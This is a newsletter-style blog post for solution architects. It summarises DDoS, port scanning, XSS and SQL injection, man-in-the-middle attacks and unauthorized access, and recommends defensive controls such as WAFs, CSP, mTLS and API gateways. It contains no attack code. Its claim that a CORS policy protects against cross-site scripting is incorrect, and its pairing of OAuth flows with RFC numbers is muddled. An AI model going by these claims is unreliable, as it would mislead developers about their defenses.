In this episode of Monday Muse, I would like talk about 5 types of security attacks and what we as Solution Architects – deal with them…
But before we go there…
Here are a few interesting data points to give you context:
- AWS reported a massive DDoS attack in February 2020. At its peak, this attack saw the incoming traffic at a rate of 2.3 TB per second.
- A hacker gained access to the personal information of over 100 million customers (including Social Security numbers and bank account details) of a US Bank in 2019,.
- In July 2022, personal data on 5.4 million Twitter users, including email addresses and phone numbers were stolen online
These are just a few data points but if you think about the legal and the reputation implication of these and similar other incidents, it numbs our mind.
Read few of them here: https://www.csoonline.com/article/567531/the-biggest-data-breach-fines-penalties-and-settlements-so-far.html
So… protecting against these security attacks – more so if you are working for a customer in a regulated industry (Banking, Insurance, Healthcare, even Retail) – one of the biggest help you can extend to the customer is providing some mitigation to these attacks.
Distributed Denial of Service
This is one of most common forms of security attacks that overwhelms a target’s resources.
The attackers flood the target with a massive volume of traffic or requests. This overwhelms the system’s resources, such as bandwidth, processing power, or memory.
As a result, the system becomes unable to respond to legitimate user requests, rendering it inactive.
As Solution Architects of digital ecosystem exposed to external customers, we must include security controls to absorb and distribute traffic, mitigating the impact of volumetric DDoS attacks.
Akamai – mostly used as a CDN service – also has Firewall service that uses real-time threat intelligence and traffic filtering techniques to block malicious traffic.
Advanced Firewalls (e.g. – F5) prevents DDoS attacks by intelligently detecting and mitigating malicious traffic. It also offers rate limiting and traffic shaping to control and filter incoming requests.
F5 also utilizes behavioral analysis and anomaly detection to identify and block DDoS attack patterns.
Port Scanning
This attack has also been around for decades.
Port scanning is an attack where an attacker probes a target’s network ports. The attacker systematically scans for open ports to identify potential vulnerabilities or services.
It helps attackers gather information for potential exploitation or unauthorized access.
(IP Scanner is a common port scanning tool used by the hackers 😟 )
We need to prevent port scanning by bad actors to mitigate the risk of potential attack at the open/unsecured ports.
A strong firewall can prevent unauthorized access to a business’s private network. It controls ports and their visibility, as well as detects when a port scan is in progress before shutting it down.
Depending on what type of perimeter and/or application firewalls are used by your customer – you should recommend network security policies and access controls.
Check Point’s Quantum IPS provides protection against port scanning and other cyber threats.
F5’s firewall and intrusion prevention features detect and block suspicious port scanning activity.
Cross Site Scripting & SQL Injection
This is also very common and one of the primary reasons we do penetration testing of application before rolling out in production is to assess the vulnerability of the application on this regard.
Cross-site scripting (XSS) occurs when malicious code is injected into a trusted website. Attackers exploit input validation vulnerabilities, allowing them to inject and execute malicious scripts.
These scripts run in the context of victim users’ browsers, leading to unauthorized actions. XSS can steal sensitive user information, manipulate website content, or perform phishing attacks.
It poses a threat to user privacy, compromises system integrity, and undermines trust in websites.
CORS (Cross-Origin Resource Sharing) is a security mechanism enforced by web browsers. It controls and restricts cross-origin requests made by web applications.
CORS policy in API Gateway prevents unauthorized access to back-end resources/services from different domains. It protects against cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.
A web application firewall (WAF) protects web applications from a variety of application layer attacks such as cross-site scripting (XSS), SQL injection, and cookie poisoning, among others.
Content Security Policy (CSP) helps prevent cross-site scripting (XSS) attacks by blocking malicious scripts. It mitigates data injection attacks by limiting the sources of executable code.
CSP is a security mechanism for mitigating web-based attacks. It defines rules that restrict the types of content that a web page can load.
CSP adds an additional layer of protection to web applications and strengthens overall security.
Man-in-the-middle attack
In a Man-in-the-Middle (MITM) attack, an attacker intercepts communication between two parties. The attacker secretly relays and possibly alters the messages exchanged between the parties.
This attack exploits vulnerabilities in insecure network protocols or weak encryption mechanisms. Man-in-the-Middle attacks can capture sensitive information, such as login credentials or financial data.
It undermines confidentiality, integrity, and trust in the compromised system’s communication.
You can read about different types of Man-in-the-Middle attack:
https://cheapsslsecurity.com/blog/types-of-man-in-the-middle-attacks/
Modern applications are distributed – application components are hosted at separate subnets, VPCs, cloud providers, data centers or even different enterprises. To avoid man-in-the-middle attack, the communication among the components are to be secured at the transport layer.
Mutual TLS (MTLS) ensures secure and authenticated communication between application components.
MTLS provides strong identity verification, preventing unauthorized access and impersonation attacks. It encrypts data in transit, safeguarding it from interception and tampering.
It establishes a trust framework, enabling secure communication even in untrusted network environments.
Unauthorized Access
Every application we built, every solution we design – prevents unauthorized access.
(In fact, it is so basic, I almost removed this section, included just for reference 🙂 )
Unauthorized access without presenting authentication token bypasses the authentication and authorization mechanisms. This exploit leverages vulnerabilities in authentication and authorization processes.
The vulnerability undermines the system’s access control and compromises data confidentiality and integrity.
Most of the established API Gateways offers authentication and access control mechanisms to secure API endpoints. Most commonly they support OIDC Implicit flow (RFC 6749) and OAuth (RFC 7523).
It enables encryption of API communications using SSL/TLS protocols, ensuring data confidentiality.
They validate and authorize API requests including validation of request origin, token content, TTL (expiry).
Conclusion
Security Attacks pose serious threats to protection of sensitive data and resources. It threatens the integrity and reliability of distributed digital ecosystem components.
The Security mechanisms safeguard against cyber threats, such as malware, hacking, and data breaches.
And they help to protect our customers against bad actors, risk threats. Those help the customers to maintain reputation and save them from drain of financial resources from litigation.
But if you think, these are also opportunities for us as Architects.
We can help in systemic analysis (even modeling) of threats and mitigate or eliminate these threats by recommending suitable control measures.
A solution architected is as good (or as bad) as the weakest link – the weakest link some of the times turn out to be lack of security control. It could turn out to be a costly mistake.
That’s all this week!
Till next week…